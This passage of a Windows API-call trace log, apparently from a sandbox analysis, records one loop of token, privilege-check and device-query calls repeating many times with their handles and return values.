pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.948] SetLastError (dwErrCode=0x522) [0016.948] CloseHandle (hObject=0x114) returned 1 [0016.948] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.948] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.948] GetLastError () returned 0x578 [0016.948] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.948] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.948] GetCurrentThread () returned 0xfffffffe [0016.948] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.948] GetLastError () returned 0x3f0 [0016.948] GetCurrentProcess () returned 0xffffffff [0016.948] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.948] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.948] SetLastError (dwErrCode=0x522) [0016.948] CloseHandle (hObject=0x114) returned 1 [0016.949] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.949] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.949] GetLastError () returned 0x578 [0016.949] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.949] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.949] GetCurrentThread () returned 0xfffffffe [0016.949] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.949] GetLastError () returned 0x3f0 [0016.949] GetCurrentProcess () returned 0xffffffff [0016.949] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.949] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.949] SetLastError (dwErrCode=0x522) [0016.949] CloseHandle (hObject=0x114) returned 1 [0016.949] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.949] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.949] GetLastError () returned 0x578 [0016.949] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.949] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.949] GetCurrentThread () returned 0xfffffffe [0016.949] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.949] GetLastError () returned 0x3f0 [0016.949] GetCurrentProcess () returned 0xffffffff [0016.949] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.949] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.949] SetLastError (dwErrCode=0x522) [0016.949] CloseHandle (hObject=0x114) returned 1 [0016.949] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.949] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.949] GetLastError () returned 0x578 [0016.949] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.949] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.949] GetCurrentThread () returned 0xfffffffe [0016.949] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.949] GetLastError () returned 0x3f0 [0016.949] GetCurrentProcess () returned 0xffffffff [0016.949] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.949] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.949] SetLastError (dwErrCode=0x522) [0016.949] CloseHandle (hObject=0x114) returned 1 [0016.949] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.949] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.949] GetLastError () returned 0x578 [0016.949] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.949] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.950] GetCurrentThread () returned 0xfffffffe [0016.950] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.950] GetLastError () returned 0x3f0 [0016.950] GetCurrentProcess () returned 0xffffffff [0016.950] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.950] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.950] SetLastError (dwErrCode=0x522) [0016.950] CloseHandle (hObject=0x114) returned 1 [0016.950] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.950] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.950] GetLastError () returned 0x578 [0016.950] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.950] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.950] GetCurrentThread () returned 0xfffffffe [0016.950] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.950] GetLastError () returned 0x3f0 [0016.950] GetCurrentProcess () returned 0xffffffff [0016.950] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.950] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.950] SetLastError (dwErrCode=0x522) [0016.950] CloseHandle (hObject=0x114) returned 1 [0016.950] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.950] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.950] GetLastError () returned 0x578 [0016.950] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.950] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.950] GetCurrentThread () returned 0xfffffffe [0016.950] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.950] GetLastError () returned 0x3f0 [0016.950] GetCurrentProcess () returned 0xffffffff [0016.950] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.950] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.950] SetLastError (dwErrCode=0x522) [0016.950] CloseHandle (hObject=0x114) returned 1 [0016.950] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.950] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.950] GetLastError () returned 0x578 [0016.950] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.950] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.950] GetCurrentThread () returned 0xfffffffe [0016.950] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.950] GetLastError () returned 0x3f0 [0016.950] GetCurrentProcess () returned 0xffffffff [0016.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.951] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.951] SetLastError (dwErrCode=0x522) [0016.951] CloseHandle (hObject=0x114) returned 1 [0016.951] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.951] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.951] GetLastError () returned 0x578 [0016.951] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.951] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.951] GetCurrentThread () returned 0xfffffffe [0016.951] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.951] GetLastError () returned 0x3f0 [0016.951] GetCurrentProcess () returned 0xffffffff [0016.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.951] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.951] SetLastError (dwErrCode=0x522) [0016.951] CloseHandle (hObject=0x114) returned 1 [0016.951] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.951] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.951] GetLastError () returned 0x578 [0016.951] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.951] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.951] GetCurrentThread () returned 0xfffffffe [0016.951] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.951] GetLastError () returned 0x3f0 [0016.951] GetCurrentProcess () returned 0xffffffff [0016.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.951] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.951] SetLastError (dwErrCode=0x522) [0016.951] CloseHandle (hObject=0x114) returned 1 [0016.951] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.951] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.951] GetLastError () returned 0x578 [0016.951] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.951] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.951] GetCurrentThread () returned 0xfffffffe [0016.951] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.951] GetLastError () returned 0x3f0 [0016.951] GetCurrentProcess () returned 0xffffffff [0016.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.951] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.952] SetLastError (dwErrCode=0x522) [0016.952] CloseHandle (hObject=0x114) returned 1 [0016.952] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.952] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.952] GetLastError () returned 0x578 [0016.952] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.952] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.952] GetCurrentThread () returned 0xfffffffe [0016.952] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.952] GetLastError () returned 0x3f0 [0016.952] GetCurrentProcess () returned 0xffffffff [0016.952] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.952] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.952] SetLastError (dwErrCode=0x522) [0016.952] CloseHandle (hObject=0x114) returned 1 [0016.952] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.952] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.952] GetLastError () returned 0x578 [0016.952] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.952] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.952] GetCurrentThread () returned 0xfffffffe [0016.952] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.952] GetLastError () returned 0x3f0 [0016.952] GetCurrentProcess () returned 0xffffffff [0016.952] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.952] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.952] SetLastError (dwErrCode=0x522) [0016.952] CloseHandle (hObject=0x114) returned 1 [0016.952] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.952] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.952] GetLastError () returned 0x578 [0016.952] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.952] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.952] GetCurrentThread () returned 0xfffffffe [0016.952] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.952] GetLastError () returned 0x3f0 [0016.952] GetCurrentProcess () returned 0xffffffff [0016.952] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.952] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.952] SetLastError (dwErrCode=0x522) [0016.952] CloseHandle (hObject=0x114) returned 1 [0016.952] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.952] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.952] GetLastError () returned 0x578 [0016.953] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.953] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.953] GetCurrentThread () returned 0xfffffffe [0016.953] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.953] GetLastError () returned 0x3f0 [0016.953] GetCurrentProcess () returned 0xffffffff [0016.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.953] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.953] SetLastError (dwErrCode=0x522) [0016.953] CloseHandle (hObject=0x114) returned 1 [0016.953] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.953] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.953] GetLastError () returned 0x578 [0016.953] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.953] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.953] GetCurrentThread () returned 0xfffffffe [0016.953] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.953] GetLastError () returned 0x3f0 [0016.953] GetCurrentProcess () returned 0xffffffff [0016.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.953] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.953] SetLastError (dwErrCode=0x522) [0016.953] CloseHandle (hObject=0x114) returned 1 [0016.953] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.953] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.953] GetLastError () returned 0x578 [0016.953] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.953] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.953] GetCurrentThread () returned 0xfffffffe [0016.953] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.953] GetLastError () returned 0x3f0 [0016.953] GetCurrentProcess () returned 0xffffffff [0016.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.954] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.954] SetLastError (dwErrCode=0x522) [0016.954] CloseHandle (hObject=0x114) returned 1 [0016.954] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.954] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.954] GetLastError () returned 0x578 [0016.954] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.954] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.954] GetCurrentThread () returned 0xfffffffe [0016.954] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.954] GetLastError () returned 0x3f0 [0016.954] GetCurrentProcess () returned 0xffffffff [0016.954] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.954] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.954] SetLastError (dwErrCode=0x522) [0016.954] CloseHandle (hObject=0x114) returned 1 [0016.954] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.954] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.954] GetLastError () returned 0x578 [0016.954] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.954] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.954] GetCurrentThread () returned 0xfffffffe [0016.954] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.954] GetLastError () returned 0x3f0 [0016.954] GetCurrentProcess () returned 0xffffffff [0016.954] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.954] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.954] SetLastError (dwErrCode=0x522) [0016.954] CloseHandle (hObject=0x114) returned 1 [0016.954] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.954] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.954] GetLastError () returned 0x578 [0016.954] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.954] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.954] GetCurrentThread () returned 0xfffffffe [0016.954] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.954] GetLastError () returned 0x3f0 [0016.954] GetCurrentProcess () returned 0xffffffff [0016.954] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.954] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.954] SetLastError (dwErrCode=0x522) [0016.955] CloseHandle (hObject=0x114) returned 1 [0016.955] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.955] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.955] GetLastError () returned 0x578 [0016.955] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.955] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.955] GetCurrentThread () returned 0xfffffffe [0016.955] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.955] GetLastError () returned 0x3f0 [0016.955] GetCurrentProcess () returned 0xffffffff [0016.955] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.955] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.955] SetLastError (dwErrCode=0x522) [0016.955] CloseHandle (hObject=0x114) returned 1 [0016.955] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.955] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.955] GetLastError () returned 0x578 [0016.955] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.955] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.955] GetCurrentThread () returned 0xfffffffe [0016.955] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.955] GetLastError () returned 0x3f0 [0016.955] GetCurrentProcess () returned 0xffffffff [0016.955] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.955] PrivilegeCheck 